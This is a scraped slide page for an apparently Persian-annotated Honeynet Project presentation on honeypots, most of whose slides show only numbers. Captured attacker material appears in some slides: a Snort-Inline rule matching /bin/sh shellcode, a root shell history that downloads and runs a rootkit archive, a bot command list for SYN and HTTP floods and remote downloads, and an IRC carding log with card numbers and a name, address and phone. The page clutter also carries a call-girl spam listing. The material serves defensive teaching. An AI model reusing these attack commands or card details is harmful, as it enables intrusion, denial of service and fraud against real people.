Finology Group – Insurtech Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 

Honeynet Project View

  • 1. Honeypot New technology for the security community By Tahoora Ketabdar
  • 2.
  • 3. IDS
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14. Snapshot of the Specter GUI Alert box هر حمله اي كه رخ داد ليست ميشود Status Personality Remote log intelligence gathering help
  • 15.
  • 16.
  • 17.
  • 18.  
  • 19.
  • 20.
  • 21.
  • 23.
  • 26.
  • 27.
  • 28.
  • 30.
  • 31. NIDS
  • 34. Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; replace: &quot;| 0000 E8D7 FFFFFF|/ ben/sh &quot;;)
  • 35.
  • 36.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 46.
  • 47.
  • 50.
  • 55. Processes مي تواند تصوير گراف پروسه ها را نيز رسم كند
  • 56. Files
  • 58. Honeynets and The Honeynet Project
  • 59.  
  • 60.  
  • 61.
  • 62.
  • 64.
  • 65.
  • 66.
  • 67.
  • 68.
  • 69.
  • 71.
  • 72.
  • 74.
  • 75. DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: &quot;give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
  • 76.
  • 77.
  • 78.
  • 79. The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
  • 80.
  • 81.
  • 82.
  • 83. Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
  • 84.
  • 85.
  • 86.
  • 89.
  • 90.
  • 91. Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
  • 92.
  • 94.
  • 95.
  • 97.
  • 99. Sponsoring YOU? Advanced Network Management Lab
  • 100.
  • 101.
  • 102.

Notas del editor

  1. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  2. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  3. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  4. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  5. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  6. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  7. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  8. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  9. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  10. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  11. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  12. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  13. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  14. Even more exciting is the ability to disable attacks by modifying the packet payload. Here we disable the DNS attack by replacing the exploit code with different values. Even if the exploit is successful, they will end up executing /ben/sh, which does not exist on any system. This creates a more realistic environment for attackers. They launch an attack and the victim responds, however the attack fails. The attacker most likely never know why it failed. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  15. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  16. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  17. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  18. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  19. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  20. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  21. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  22. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  23. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  24. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  25. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  26. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  27. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  28. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  29. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  30. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  31. This is the agenda we will be following for today. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  32. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  33. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  34. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  35. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  36. Keep in mind this statistical information was gathered during 2000-2001. We fully believe that the threats on the Internet are exponentially more active due to the release of highly automated tools, such as worms and auto-rooters. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  37. We believe this to be a Romanian blackhat that lives on the east coast. His handle is thought to be ‘Johnny17’. The Honeynet Project captured this real time video as one of our Honeynets was under attack. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  38. After one of our Honeynets was compromised with the dtspcd exploit, the system was used for the attackers to communicate with each other. This was part of their conversation. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  39. Honeynets can detect activity on any protocol, increasing their chances of detecting previously unknown attacks. For example, a Honeynet was recently compromised and a backdoor was placed on the system. The backdoor used encoded IP protocol 11 packets for communication. This is a covert channel between the hacker and the compromised system. The Honeynet detected and captured this anomalous traffic and allowed us to analyze the attacker’s actions. Above we see the encoded covert communications sent by the attacker to the honeypot. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  40. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  41. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  42. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  43. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  44. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  45. Feel free to contact the Honeynet Project with any idea, questions, or concerns you may have. If you are interested in learning more about information security in general, you can find books written by member of the Honeynet Project at http://www.honeynet.org/book/books.html Best of luck! --- The Honeynet Project --- Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)